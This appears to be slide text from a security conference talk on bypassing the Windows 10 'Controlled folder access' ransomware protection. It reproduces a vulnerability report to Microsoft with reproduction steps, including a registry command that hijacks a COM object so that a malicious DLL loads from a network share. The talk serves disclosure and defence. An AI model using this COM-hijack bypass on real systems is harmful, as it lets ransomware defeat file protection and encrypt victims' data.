The WannaCry cyber-attack all over the world in May, 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of "Ransomware protection" through demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you that we may have to reconsider the definition of vulnerability.
2. My Profile
1992 ~ 2014
software developer of Windows.
2015 ~
security researcher
- 2016 AVTOKYO
- 2017 BSides Las Vegas
- 2018 GrrCON
- 2018 ToorCon
- 2018 DerbyCon
2018 ~
BSides Tokyo Organizer
- 2018 first BSides in East Asia
SOYA AOYAMA
Researcher @ Fujitsu System Integration Laboratories Ltd
Fujitsu Security Meister, High Master, Global White hacker
Organizer @ BSides Tokyo
7. TANMAY GANACHARYA
Principal Group Manager, Windows Defender Research
Ransomware protection on Windows 10
For end users, the dreaded ransom
note announces that ransomware has
already taken their files hostage:
documents, precious photos and
videos, and other important files
encrypted. On Windows 10 Fall
Creators Update, a new feature helps
stop ransomware from accessing
important files in real-time, even if it
manages to infect the computer. When
enabled, Controlled folder access locks
down folders, allowing only authorized
apps to access files.
18. YAGO JESUS
MICROSOFT ANTI RANSOMWARE BYPASS
By default, Office executables are included in the whitelist so these programs
could make changes in protected folders without restrictions.
This access level is granted even if a malicious user uses OLE/COM objects to
drive Office executables programmatically.
So a Ransomware developer could adapt their software to use OLE objects to
change / delete / encrypt files invisibly for the files owner
26. I submitted the vulnerability report to MSRC
• Step-by-step instructions to reproduce the issue on a fresh install
1. Put the malicious dll on shared file server. (10.0.1.40shareAnti-ControlledFolderAccess.dll)
2. Start the cmd.exe on target PC. (An administrator privilege is NOT required)
3. Execute the following command.
4. Start the procexp.exe on target PC.
reg add HKCUSoftwareClassesCLSID{90AA3A4E-1CBA-4233-B8BB-535773D48449}
InprocServer32 /f /ve /t REG_SZ /d 10.0.1.40tmpAnti-ControlledFolderAccess.dll
taskkill /IM explorer.exe /F
start explorer.exe
35. How to avoid it?
always check
if malicious values are written in the registry.
36. Ransomware protection
PC BPC A
security boundary
Ransomware protection
MS17-010
Documents Pictures Videos
Music Desktop Favorites
security vulnerability
new boundary
37. We should reconsider the definition
PC BPC A
security boundary
Ransomware protection
security vulnerability
security sub boundary
security sub vulnerability
Documents Pictures Videos
Music Desktop Favorites